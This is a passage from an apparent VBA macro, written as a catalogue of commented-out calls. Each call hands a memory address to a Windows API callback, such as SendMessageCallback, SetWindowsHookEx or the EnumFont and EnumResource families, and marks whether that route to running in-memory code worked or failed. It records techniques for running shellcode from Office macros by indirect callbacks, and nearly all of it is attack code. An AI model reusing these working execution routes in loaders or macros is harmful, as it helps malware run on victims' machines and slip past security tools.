' WORK SendMessageCallbackA 303 | 'executeResult = shellExecute(windowHandle, zL, zL, zL, memoryAddress, zL) ' WORK SendMessageCallbackW 304 | 'executeResult = shellExecute(zL, oL, moduleHandle, memoryAddress, zL, zL, zL) ' WORK SetWinEventHook (Works only if you trigger event, so possibly calling NotifyWinEvent - didn't get it working outside of debugger so not including) 305 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL) ' WORK SetWindowsHookExA 306 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL) ' WORK SetWindowsHookExW 307 | 308 | ' ################## 309 | ' FAILED FUNCTIONS # 310 | ' ################## 311 | 312 | 'executeResult = shellExecute(oL, oL, memoryAddress, oL) ' FAIL AddClusterNode 313 | 'executeResult = shellExecute(zL, zL, memoryAddress, zL) ' NODLL BluetoothRegisterForAuthentication 314 | 'executeResult = shellExecute(oL, oL, oL, oL, oL, oL, oL, oL, oL, memoryAddress, oL) ' FAIL CMTranslateRGBsExt 315 | 'executeResult = shellExecute(zL, memoryAddress, zL) ' FAIL CreateCluster (May work if you pass cluster config) 316 | 'executeResult = shellExecute(oL, oL, windowHandle, memoryAddress, zL) ' FAIL CreateDialogIndirectParamA 317 | 'executeResult = shellExecute(oL, oL, windowHandle, memoryAddress, zL) ' FAIL CreateDialogIndirectParamW 318 | 'executeResult = shellExecute(moduleHandle, oL, windowHandle, memoryAddress, zL) ' FAIL CreateDialogParamA 319 | 'executeResult = shellExecute(moduleHandle, oL, windowHandle, memoryAddress, zL) ' FAIL CreateDialogParamW 320 | 'executeResult = shellExecute(zL, zL, zL, zL, memoryAddress, zL) ' CANTFIND CreatePrintAsyncNotifyChannel 321 | 'executeResult = shellExecute(oL, zL, memoryAddress, zL, oL, oL, oL) ' FAIL CreateTimerQueueTimer 322 | 'executeResult = shellExecute(memoryAddress, zL) ' NODLL DavRegisterAuthCallback 323 | 'executeResult = shellExecute(moduleHandle, memoryAddress, oL, zL) ' FAIL DestroyCluster 324 | 'executeResult = shellExecute(moduleHandle, oL, windowHandle, memoryAddress, oL) ' FAIL DialogBoxParamA 325 | 'executeResult = shellExecute(moduleHandle, oL, windowHandle, memoryAddress, oL) ' FAIL DialogBoxParamW 326 | 'executeResult = shellExecute(moduleHandle, moduleHandle, memoryAddress, oL, oL, oL, oL, oL, oL, oL) ' FAIL DrawStateA 327 | 'executeResult = shellExecute(moduleHandle, moduleHandle, memoryAddress, oL, oL, oL, oL, oL, oL, oL) ' FAIL DrawStateW 328 | 'executeResult = shellExecute(oL, memoryAddress, oL) ' FAIL EnumChildWindows 329 | 'executeResult = shellExecute(oL, oL, memoryAddress, oL, oL) ' FAIL EnumEnhMetaFile 330 | 'executeResult = shellExecute(oL, oL, memoryAddress, oL) ' FAIL EnumFontFamiliesA 331 | 'executeResult = shellExecute(oL, oL, memoryAddress, oL) ' FAIL EnumFontFamiliesW 332 | 'executeResult = shellExecute(oL, oL, memoryAddress, oL, zL) ' FAIL EnumFontFamiliesExA 333 | 'executeResult = shellExecute(oL, oL, memoryAddress, oL, zL) ' FAIL EnumFontFamiliesExW 334 | 'executeResult = shellExecute(oL, oL, memoryAddress, oL) ' FAIL EnumFontsA 335 | 'executeResult = shellExecute(gethandle, memoryAddress, oL) ' FAIL EnumICMProfilesA 336 | 'executeResult = shellExecute(gethandle, memoryAddress, oL) ' FAIL EnumICMProfilesW 337 | 'executeResult = shellExecute(oL, oL, memoryAddress, zL) ' FAIL EnumMetaFile 338 | 'executeResult = shellExecute(zL, oL, memoryAddress, oL) ' FAIL EnumObjects 339 | 'executeResult = shellExecute(windowHandle, oL, oL, memoryAddress, zL) ' FAIL EnumResourceLanguagesA 340 | 'executeResult = shellExecute(windowHandle, oL, oL, memoryAddress, zL) ' FAIL EnumResourceLanguagesW 341 | 'executeResult = shellExecute(windowHandle, oL, oL, memoryAddress, zL, oL, zL) ' FAIL EnumResourceLanguagesExA 342 | 'executeResult = shellExecute(windowHandle, oL, oL, memoryAddress, zL, oL, zL) ' FAIL EnumResourceLanguagesExW 343 | 'rL = 9 344 | 'executeResult = shellExecute(moduleHandle, rL, memoryAddress, zL) ' FAIL EnumResourceNamesA 345 | 'executeResult = shellExecute(zL, oL, memoryAddress, oL) ' FAIL EnumResourceNamesW 346 | 'executeResult = shellExecute(zL, oL, memoryAddress, oL, zL, zL) ' FAIL EnumResourceNamesExA 347 | 'executeResult = shellExecute(zL, oL, memoryAddress, oL, zL, zL) ' FAIL EnumResourceNamesExW 348 | 'executeResult = shellExecute(oL, oL, memoryAddress, zL) ' FAIL EventRegister 349 | 'executeResult = shellExecute(processHandle, memoryAddress, oL, oL, oL) ' FAIL GetApplicationRecoveryCallback 350 | 'executeResult = shellExecute(oL, oL, oL, oL, memoryAddress, oL) ' FAIL LineDDA 351 | 'executeResult = shellExecute(zL, moduleHandle, memoryAddress, oL, oL) ' FAIL NotifyStableUnicastIpAddressTable 352 | 'executeResult = shellExecute(oL, memoryAddress, oL) ' FAIL PerfStartProvider 353 | 'executeResult = shellExecute(memoryAddress, processHandle, oL) ' FAIL ReadEncryptedFileRaw (Might work with some time) 354 | 'executeResult = shellExecute(memoryAddress, oL, zL, zL) ' FAIL RegisterApplicationRecoveryCallback 355 | 'executeResult = shellExecute(zL, zL, zL, zL, memoryAddress, zL) ' NOFUNC RegisterForPrintAsyncNotifications 356 | 'executeResult = shellExecute(processHandle, memoryAddress, processHandle) ' FAIL RegisterServiceCtrlHandlerExA 357 | 'executeResult = shellExecute(processHandle, memoryAddress, processHandle) ' FAIL RegisterServiceCtrlHandlerExW 358 | 'rL = 4 359 | 'executeResult = shellExecute(moduleHandle, moduleHandle, memoryAddress, oL, oL, rL) ' FAIL RegisterWaitForSingleObject (Might work with some time) 360 | 'executeResult = shellExecute(oL, oL, memoryAddress, oL, oL, oL, oL) ' FAIL SetTimerQueueTimer (Might work with some time) 361 | 'executeResult = shellExecute(processHandle, oL, zL, zL, memoryAddress, zL) ' ERRBADCALL SymEnumLines 362 | 'executeResult = shellExecute(memoryAddress, oL) ' ERRBADCALL SymEnumProcesses 363 | 'executeResult = shellExecute(processHandle, oL, zL, zL, zL, zL, memoryAddress, zL) ' ERRBADCALL SymEnumSourceLines 364 | 'executeResult = shellExecute(processHandle, oL, oL, memoryAddress, oL) ' ERRBADCALL SymEnumSymbols 365 | 'executeResult = shellExecute(oL, oL, zL, oL, oL, zL, oL, zL, zL, memoryAddress, oL) ' FAIL TranslateBitmapBits 366 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL) ' NODLL WPUQueryBlockingCallback 367 | 'executeResult = shellExecute(zL, zL, zL, zL, zL, zL, memoryAddress, zL, zL) ' NODLL WdsCliTransferFile 368 | 'executeResult = shellExecute(moduleHandle, zL, zL, memoryAddress, oL, moduleHandle, oL) ' FAIL WlanRegisterNotification 369 | 'executeResult = shellExecute(memoryAddress, memoryAddress, memoryAddress) ' FAIL WriteEncryptedFileRaw 370 | 'executeResult = shellExecute(moduleHandle, memoryAddress, zL, zL) ' FAIL WsPullBytes 371 | 'executeResult = shellExecute(oL, memoryAddress, oL) ' FAIL mciSetYieldProc 372 | 'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, zL) ' FAIL midiInOpen 373 | 374 | Stop 375 | 376 | End Sub 377 | 378 | --------------------------------------------------------------------------------